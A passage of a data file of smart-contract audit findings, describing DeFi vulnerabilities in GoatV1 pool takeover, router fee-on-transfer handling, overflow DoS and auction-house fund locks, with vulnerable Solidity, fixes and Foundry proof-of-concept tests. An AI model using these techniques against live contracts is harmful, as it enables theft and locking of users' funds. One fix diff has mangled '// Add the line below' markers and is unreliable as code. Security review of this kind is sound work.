no swaps would have occured\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if ((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new team\\n uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if (\\n tokenAmountIn\\n < (\\n localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\n\\nAlthough there is a check for the amount of `token` at L481, if the caller sets `initParams.initialEth` to 0, it can easily pass L481 because a smaller `initParams.initialEth` results in a larger `localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew`. This is due to the fact that the former initial provider's `initialEth` does not have any effect in preventing takeovers.чThere should be a check for `initParams.initialEth`.чA pool could be unfairly taken over because the former initial provider's `initialEth` does not have any effect in preventing takeovers.ч```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if no swaps would have occured\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if ((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new team\\n uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if (\\n tokenAmountIn\\n < (\\n localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\n -Legitimate pools can be taken over and the penalty is not fair.чmediumчIn GoatV1Pair.takeOverPool(), a malicious user can take over pool from a legitimate user, because the mechanism for identifying is incorrect. And the penalty mechanism is not fair.\\nGoatV1Pair.takeOverPool() function exists to avoid grief, because only one pool can be created for each token. Doc says \"They can then lower the amount of virtual Ether or Ether to be raised, but not make it higher.\" about GoatV1Pair.takeOverPool(). However, there is no checking for the amount of virtual Ether. This made it possible that legitimate pools can be taken over by malicious users.\\nL481 and L496 checks the amount of tokens, but there is no check for virtual Ether or Ether to be raised. So, a malicious user can take over a legitimate pool without any cost. He can remove his cost by increasing the amount of virtual Ether or reserved Ether. Paying +10 percent token can do nothing with it. Furthermore, the old liquidity provider should pay 5% penalty. This is very unfair. Generally, a malicious user have no Ether reserved. So, it is only harmful to legitimate users.\\n```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if no swaps would have occured\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if ((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new team\\n uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if (\\n496 tokenAmountIn\\n497 < (\\n498 localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n499 + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n500 )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\nчI think that the mechanism for identifying should be improved.чLegitimate pools can be taken over unfairly.ч```\\n function takeOverPool(GoatTypes.InitParams memory initParams) external {\\n if (_vestingUntil != _MAX_UINT32) {\\n revert GoatErrors.ActionNotAllowed();\\n }\\n\\n GoatTypes.InitialLPInfo memory initialLpInfo = _initialLPInfo;\\n\\n GoatTypes.LocalVariables_TakeOverPool memory localVars;\\n address to = msg.sender;\\n localVars.virtualEthOld = _virtualEth;\\n localVars.bootstrapEthOld = _bootstrapEth;\\n localVars.initialTokenMatchOld = _initialTokenMatch;\\n\\n (localVars.tokenAmountForPresaleOld, localVars.tokenAmountForAmmOld) = _tokenAmountsForLiquidityBootstrap(\\n localVars.virtualEthOld,\\n localVars.bootstrapEthOld,\\n initialLpInfo.initialWethAdded,\\n localVars.initialTokenMatchOld\\n );\\n\\n // new token amount for bootstrap if no swaps would have occured\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, initParams.initialEth, initParams.initialTokenMatch\\n );\\n\\n // team needs to add min 10% more tokens than the initial lp to take over\\n localVars.minTokenNeeded =\\n ((localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld) * 11000) / 10000;\\n\\n481 if ((localVars.tokenAmountForAmmNew + localVars.tokenAmountForPresaleNew) < localVars.minTokenNeeded) {\\n revert GoatErrors.InsufficientTakeoverTokenAmount();\\n }\\n\\n localVars.reserveEth = _reserveEth;\\n\\n // Actual token amounts needed if the reserves have updated after initial lp mint\\n (localVars.tokenAmountForPresaleNew, localVars.tokenAmountForAmmNew) = _tokenAmountsForLiquidityBootstrap(\\n initParams.virtualEth, initParams.bootstrapEth, localVars.reserveEth, initParams.initialTokenMatch\\n );\\n localVars.reserveToken = _reserveToken;\\n\\n // amount of tokens transferred by the new team\\n uint256 tokenAmountIn = IERC20(_token).balanceOf(address(this)) - localVars.reserveToken;\\n\\n if (\\n496 tokenAmountIn\\n497 < (\\n498 localVars.tokenAmountForPresaleOld + localVars.tokenAmountForAmmOld - localVars.reserveToken\\n499 + localVars.tokenAmountForPresaleNew + localVars.tokenAmountForAmmNew\\n500 )\\n ) {\\n revert GoatErrors.IncorrectTokenAmount();\\n }\\n\\n localVars.pendingLiquidityFees = _pendingLiquidityFees;\\n localVars.pendingProtocolFees = _pendingProtocolFees;\\n\\n // amount of weth transferred by the new team\\n uint256 wethAmountIn = IERC20(_weth).balanceOf(address(this)) - localVars.reserveEth\\n - localVars.pendingLiquidityFees - localVars.pendingProtocolFees;\\n\\n if (wethAmountIn < localVars.reserveEth) {\\n revert GoatErrors.IncorrectWethAmount();\\n }\\n\\n _handleTakeoverTransfers(\\n IERC20(_weth), IERC20(_token), initialLpInfo.liquidityProvider, localVars.reserveEth, localVars.reserveToken\\n );\\n\\n uint256 lpBalance = balanceOf(initialLpInfo.liquidityProvider);\\n _burn(initialLpInfo.liquidityProvider, lpBalance);\\n\\n // new lp balance\\n lpBalance = Math.sqrt(uint256(initParams.virtualEth) * initParams.initialTokenMatch) - MINIMUM_LIQUIDITY;\\n _mint(to, lpBalance);\\n\\n _updateStateAfterTakeover(\\n initParams.virtualEth,\\n initParams.bootstrapEth,\\n initParams.initialTokenMatch,\\n wethAmountIn,\\n tokenAmountIn,\\n lpBalance,\\n to,\\n initParams.initialEth\\n );\\n }\\n```\\n -The router is not compatible with fee on transfers tokensчmediumчThe router is not compatible with fee on transfers tokens.\\nLet's take as example the removeLiquidity function:\\n```\\naddress pair = GoatV1Factory(FACTORY).getPool(token);\\n\\nIERC20(pair).safeTransferFrom(msg.sender, pair, liquidity); //-> 1. Transfers liquidity tokens to the pair\\n(amountWeth, amountToken) = GoatV1Pair(pair).burn(to); //-> 2. Burns the liquidity tokens and sends WETH and TOKEN to the recipient\\nif (amountWeth < wethMin) { //-> 3. Ensures enough WETH has been transferred\\n revert GoatErrors.InsufficientWethAmount();\\n}\\nif (amountToken < tokenMin) { //4. Ensures enough TOKEN has been transferred\\n revert GoatErrors.InsufficientTokenAmount();\\n}\\n```\\n\\nIt does the following:\\nTransfers liquidity tokens `to` the pair.\\nBurns the liquidity tokens and sends WETH and TOKEN `to` the recipient `to`.\\nEnsures enough WETH has been transferred.\\nEnsures enough TOKEN has been transferred.\\nAt point `4` the router doesn't account for the fee paid to transfer TOKEN. The recipient didn't actually receive `amountToken`, but slightly less because a fee has been charged.\\nAnother interesting example is the removeLiquidityETH which first burns the liquidity and transfers the tokens to the router itself, and then from the router the tokens are transferred to the recipient. This will charge double the fees.\\nThis is just two examples to highlight the fact that these kind of tokens are not supported, but the other functions in the router have similar issues that can cause all sorts of trouble including reverts and loss of funds.чAdd functionality to the router to support fee on transfer tokens, a good example of where this is correctly implememented is the Uniswap Router02.чThe router is not compatible with fee on transfers tokens.ч```\\naddress pair = GoatV1Factory(FACTORY).getPool(token);\\n\\nIERC20(pair).safeTransferFrom(msg.sender, pair, liquidity); //-> 1. Transfers liquidity tokens to the pair\\n(amountWeth, amountToken) = GoatV1Pair(pair).burn(to); //-> 2. Burns the liquidity tokens and sends WETH and TOKEN to the recipient\\nif (amountWeth < wethMin) { //-> 3. Ensures enough WETH has been transferred\\n revert GoatErrors.InsufficientWethAmount();\\n}\\nif (amountToken < tokenMin) { //4. Ensures enough TOKEN has been transferred\\n revert GoatErrors.InsufficientTokenAmount();\\n}\\n```\\n -It's possible to create pairs that cannot be taken overчmediumчIt's possible to create pairs that cannot be taken over and DOS a pair forever.\\nA pair is created by calling createPair() which takes the initial parameters of the pair as inputs but the initial parameters are never verified, which makes it possible for an attacker to create a token pair that's impossible to recover via takeOverPool().\\nThere's more ways to create a pair that cannot be taken over, a simple example is to set all of the initial parameters to the maximum possible value:\\n```\\nuint112 virtualEth = type(uint112).max;\\nuint112 bootstrapEth = type(uint112).max;\\nuint112 initialEth = type(uint112).max;\\nuint112 initialTokenMatch = type(uint112).max;\\n```\\n\\nThis will make takeOverPool() revert for overflow on the internal call to _tokenAmountsForLiquidityBootstrap:\\n```\\nuint256 k = virtualEth * initialTokenMatch;\\n tokenAmtForAmm = (k * bootstrapEth) / (totalEth * totalEth);\\n```\\n\\nHere `virtualEth`, `initialTokenMatch` and `bootstrapEth` are all setted to `type(uint112).max`. The multiplication `virtualEth` * `initialTokenMatch` * `bootstrapEth` performed to calculate `tokenAmtForAmm` will revert for overflow because `2^112 * 2^112 * 2^112 = 2^336` which is bigger than `2^256`.чValidate a pair initial parameters and mint liquidity on pool creation.чCreation of new pairs can be DOSed forever.ч```\\nuint112 virtualEth = type(uint112).max;\\nuint112 bootstrapEth = type(uint112).max;\\nuint112 initialEth = type(uint112).max;\\nuint112 initialTokenMatch = type(uint112).max;\\n```\\n -[M-1]чhighчSeller's funds may remain locked in the protocol, because of revert on 0 transfer tokens. In the README.md file is stated that the protocol uses every token with ERC20 Metadata and decimals between 6-18, which includes some revert on 0 transfer tokens, so this should be considered as valid issue!\\nin the `AuctionHouse::claimProceeds()` function there is the following block of code:\\n```\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n prefundingRefund,\\n false\\n );\\n```\\n\\nSince the batch auctions must be prefunded so `routing.funding` shouldn't be zero unless all the tokens were sent in settle, in which case `payoutSent` will equal `sold_`. From this we make the conclusion that it is possible for `prefundingRefund` to be equal to 0. This means if the `routing.baseToken` is a revert on 0 transfer token the seller will never be able to get the `quoteToken` he should get from the auction.чCheck if the `prefundingRefund > 0` like this:\\n```\\n function claimProceeds(\\n uint96 lotId_,\\n bytes calldata callbackData_\\n ) external override nonReentrant {\\n // Validation\\n _isLotValid(lotId_);\\n\\n // Call auction module to validate and update data\\n (uint96 purchased_, uint96 sold_, uint96 payoutSent_) =\\n _getModuleForId(lotId_).claimProceeds(lotId_);\\n\\n // Load data for the lot\\n Routing storage routing = lotRouting[lotId_];\\n\\n // Calculate the referrer and protocol fees for the amount in\\n // Fees are not allocated until the user claims their payout so that we don't have to iterate through them here\\n // If a referrer is not set, that portion of the fee defaults to the protocol\\n uint96 totalInLessFees;\\n {\\n (, uint96 toProtocol) = calculateQuoteFees(\\n lotFees[lotId_].protocolFee, lotFees[lotId_].referrerFee, false, purchased_\\n );\\n unchecked {\\n totalInLessFees = purchased_ - toProtocol;\\n }\\n }\\n\\n // Send payment in bulk to the address dictated by the callbacks address\\n // If the callbacks contract is configured to receive quote tokens, send the quote tokens to the callbacks contract and call the onClaimProceeds callback\\n // If not, send the quote tokens to the seller and call the onClaimProceeds callback\\n _sendPayment(routing.seller, totalInLessFees, routing.quoteToken, routing.callbacks);\\n\\n // Refund any unused capacity and curator fees to the address dictated by the callbacks address\\n // By this stage, a partial payout (if applicable) and curator fees have been paid, leaving only the payout amount (`totalOut`) remaining.\\n uint96 prefundingRefund = routing.funding // Add the line below\\n payoutSent_ - sold_;\\n// Add the line below\\n// Add the line below\\n if(prefundingRefund > 0) { \\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n prefundingRefund,\\n false\\n );\\n// Add the line below\\n// Add the line below\\n }\\n \\n\\n // Call the onClaimProceeds callback\\n Callbacks.onClaimProceeds(\\n routing.callbacks, lotId_, totalInLessFees, prefundingRefund, callbackData_\\n );\\n }\\n```\\nчThe seller's funds remain locked in the system and he will never be able to get them back.ч```\\n uint96 prefundingRefund = routing.funding + payoutSent_ - sold_;\\n unchecked {\\n routing.funding -= prefundingRefund;\\n }\\n Transfer.transfer(\\n routing.baseToken,\\n _getAddressGivenCallbackBaseTokenFlag(routing.callbacks, routing.seller),\\n prefundingRefund,\\n false\\n );\\n```\\n -Module's gas yield can never be claimed and all yield will be lostчhighчModule's gas yield can never be claimed\\nThe protocol is meant to be deployed on blast, meaning that the gas and ether balance accrue yield.\\nBy default these yield settings for both ETH and GAS yields are set to VOID as default, meaning that unless we configure the yield mode to claimable, we will be unable to recieve the yield. The protocol never sets gas to claimable for the modules, and the governor of the contract is the auction house, the auction house also does not implement any function to set the modules gas yield to claimable.\\n```\\n constructor(address auctionHouse_) LinearVesting(auctionHouse_) BlastGas(auctionHouse_) {}\\n```\\n\\nThe constructor of both BlastLinearVesting and BlastEMPAM set the auction house here `BlastGas(auctionHouse_)` if we look at this contract we can observe the above.\\nBlastGas.sol\\n```\\n constructor(address parent_) {\\n // Configure governor to claim gas fees\\n IBlast(0x4300000000000000000000000000000000000002).configureGovernor(parent_);\\n }\\n```\\n\\nAs we can see above, the governor is set in constructor, but we never set gas to claimable. Gas yield mode will be in its default mode which is VOID, the modules will not accue gas yields. Since these modules never set gas yield mode to claimable, the auction house cannot claim any gas yield for either of the contracts. Additionally the auction house includes no function to configure yield mode, the auction house contract only has a function to claim the gas yield but this will revert since the yield mode for these module contracts will be VOID.чchange the following in BlastGas contract, this will set the gas yield of the modules to claimable in the constructor and allowing the auction house to claim gas yield.\\n```\\ninterface IBlast {\\n function configureGovernor(address governor_) external;\\n function configureClaimableGas() external; \\n}\\n\\nabstract contract BlastGas {\\n // ========== CONSTRUCTOR ========== //\\n\\n constructor(address parent_) {\\n // Configure governor to claim gas fees\\n IBlast(0x4300000000000000000000000000000000000002).configureClaimableGas();\\n IBlast(0x4300000000000000000000000000000000000002).configureGovernor(parent_);\\n }\\n}\\n```\\nчGas yields will never acrue and the yield will forever be lostч```\\n constructor(address auctionHouse_) LinearVesting(auctionHouse_) BlastGas(auctionHouse_) {}\\n```\\n -Auction creators have the ability to lock bidders' funds.чhighч`Auction creators` have the ability to cancel an `auction` before it starts. However, once the `auction` begins, they should not be allowed to cancel it. During the `auction`, `bidders` can place `bids` and send `quote` tokens to the `auction` house. After the `auction` concludes, `bidders` can either receive `base` tokens or retrieve their `quote` tokens. Unfortunately, batch `auction` creators can cancel an `auction` when it ends. This means that `auction` creators can cancel their `auctions` if they anticipate `losses`. This should not be allowed. The significant risk is that `bidders' funds` could become locked in the `auction` house.\\n`Auction creators` can not cancel an `auction` once it concludes.\\n```\\nfunction cancelAuction(uint96 lotId_) external override onlyInternal {\\n _revertIfLotConcluded(lotId_);\\n}\\n```\\n\\nThey also can not cancel it while it is active.\\n```\\nfunction _cancelAuction(uint96 lotId_) internal override {\\n _revertIfLotActive(lotId_);\\n\\n auctionData[lotId_].status = Auction.Status.Claimed;\\n}\\n```\\n\\nWhen the `block.timestamp` aligns with the `conclusion` time of the `auction`, we can bypass these checks.\\n```\\nfunction _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n}\\nfunction _revertIfLotActive(uint96 lotId_) internal view override {\\n if (\\n auctionData[lotId_].status == Auction.Status.Created\\n && lotData[lotId_].start <= block.timestamp\\n && lotData[lotId_].conclusion > block.timestamp\\n ) revert Auction_WrongState(lotId_);\\n}\\n```\\n\\nSo `Auction creators` can cancel an `auction` when it concludes. Then the `capacity` becomes `0` and the `auction` status transitions to `Claimed`.\\n`Bidders` can not `refund` their `bids`.\\n```\\nfunction refundBid(\\n uint96 lotId_,\\n uint64 bidId_,\\n address caller_\\n) external override onlyInternal returns (uint96 refund) {\\n _revertIfLotConcluded(lotId_);\\n}\\n function _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n}\\n```\\n\\nThe only way for `bidders` to reclaim their tokens is by calling the `claimBids` function. However, `bidders` can only claim `bids` when the `auction status` is `Settled`.\\n```\\nfunction claimBids(\\n uint96 lotId_,\\n uint64[] calldata bidIds_\\n) {\\n _revertIfLotNotSettled(lotId_);\\n}\\n```\\n\\nTo `settle` the `auction`, the `auction` status should be `Decrypted`. This requires submitting the `private key`. The `auction` creator can not submit the `private key` or submit it without decrypting any `bids` by calling `submitPrivateKey(lotId, privateKey, 0)`. Then nobody can decrypt the `bids` using the `decryptAndSortBids` function which always reverts.\\n```\\nfunction decryptAndSortBids(uint96 lotId_, uint64 num_) external {\\n if (\\n auctionData[lotId_].status != Auction.Status.Created // @audit, here\\n || auctionData[lotId_].privateKey == 0\\n ) {\\n revert Auction_WrongState(lotId_);\\n }\\n\\n _decryptAndSortBids(lotId_, num_);\\n}\\n```\\n\\nAs a result, the `auction status` remains unchanged, preventing it from transitioning to `Settled`. This leaves the `bidders'` `quote` tokens locked in the `auction house`.\\nPlease add below test to the `test/modules/Auction/cancel.t.sol`.\\n```\\nfunction test_cancel() external whenLotIsCreated {\\n Auction.Lot memory lot = _mockAuctionModule.getLot(_lotId);\\n\\n console2.log(\"lot.conclusion before ==> \", lot.conclusion);\\n console2.log(\"block.timestamp before ==> \", block.timestamp);\\n console2.log(\"isLive ==> \", _mockAuctionModule.isLive(_lotId));\\n\\n vm.warp(lot.conclusion - block.timestamp + 1);\\n console2.log(\"lot.conclusion after ==> \", lot.conclusion);\\n console2.log(\"block.timestamp after ==> \", block.timestamp);\\n console2.log(\"isLive ==> \", _mockAuctionModule.isLive(_lotId));\\n\\n vm.prank(address(_auctionHouse));\\n _mockAuctionModule.cancelAuction(_lotId);\\n}\\n```\\n\\nThe log is\\n```\\nlot.conclusion before ==> 86401\\nblock.timestamp before ==> 1\\nisLive ==> true\\nlot.conclusion after ==> 86401\\nblock.timestamp after ==> 86401\\nisLive ==> false\\n```\\nч```\\nfunction _revertIfLotConcluded(uint96 lotId_) internal view virtual {\\n- if (lotData[lotId_].conclusion < uint48(block.timestamp)) {\\n+ if (lotData[lotId_].conclusion <= uint48(block.timestamp)) {\\n revert Auction_MarketNotActive(lotId_);\\n }\\n\\n // Capacity is sold-out, or cancelled\\n if (lotData[lotId_].capacity == 0) revert Auction_MarketNotActive(lotId_);\\n}\\n```\\nчUsers' funds can be locked.ч```\\nfunction cancelAuction(uint96 lotId_) external override onlyInternal {\\n _revertIfLotConcluded(lotId_);\\n}\\n```\\n -Bidders can not claim their bids if the auction creator claims the proceeds.чhighчBefore the batch `auction` begins, the `auction` creator should `prefund` `base` tokens to the `auction` house. During the `auction`, `bidders` transfer `quote` tokens to the `auction` house. After the `auction` settles,\\n`Bidders` can claim their `bids` and either to receive `base` tokens or `retrieve` their `quote` tokens.\\nThe `auction creator` can receive the `quote` tokens and `retrieve` the remaining `base` tokens.\\nThere is no specific order for these two operations.\\nHowever, if the `auction creator` claims the `proceeds`, `bidders` can not claim their `bids` anymore. Consequently, their `funds` will remain locked in the `auction house`.\\nWhen the `auction creator` claims `Proceeds`, the `auction status` changes to `Claimed`.\\n```\\nfunction _claimProceeds(uint96 lotId_)\\n internal\\n override\\n returns (uint96 purchased, uint96 sold, uint96 payoutSent)\\n{\\n auctionData[lotId_].status = Auction.Status.Claimed;\\n}\\n```\\n\\nOnce the `auction status` has transitioned to `Claimed`, there is indeed no way to change it back to `Settled`.\\nHowever, `bidders` can only claim their `bids` when the `auction status` is `Settled`.\\n```\\nfunction claimBids(\\n uint96 lotId_,\\n uint64[] calldata bidIds_\\n)\\n external\\n override\\n onlyInternal\\n returns (BidClaim[] memory bidClaims, bytes memory auctionOutput)\\n{\\n _revertIfLotInvalid(lotId_);\\n _revertIfLotNotSettled(lotId_); // @audit, here\\n\\n return _claimBids(lotId_, bidIds_);\\n}\\n```\\n\\nPlease add below test to the `test/modules/auctions/claimBids.t.sol`.\\n```\\nfunction test_claimProceeds_before_claimBids()\\n external\\n givenLotIsCreated\\n givenLotHasStarted\\n givenBidIsCreated(_BID_AMOUNT_UNSUCCESSFUL, _BID_AMOUNT_OUT_UNSUCCESSFUL)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenBidIsCreated(_BID_PRICE_TWO_AMOUNT, _BID_PRICE_TWO_AMOUNT_OUT)\\n givenLotHasConcluded\\n givenPrivateKeyIsSubmitted\\n givenLotIsDecrypted\\n givenLotIsSettled\\n{\\n uint64 bidId = 1;\\n\\n uint64[] memory bidIds = new uint64[](1);\\n bidIds[0] = bidId;\\n\\n // Call the function\\n vm.prank(address(_auctionHouse));\\n _module.claimProceeds(_lotId);\\n\\n\\n bytes memory err = abi.encodeWithSelector(EncryptedMarginalPriceAuctionModule.Auction_WrongState.selector, _lotId);\\n vm.expectRevert(err);\\n vm.prank(address(_auctionHouse));\\n _module.claimBids(_lotId, bidIds);\\n}\\n```\\nчAllow `bidders` to claim their `bids` even when the `auction status` is `Claimed`.чUsers' funds could be locked.ч```\\nfunction _claimProceeds(uint96 lotId_)\\n internal\\n override\\n 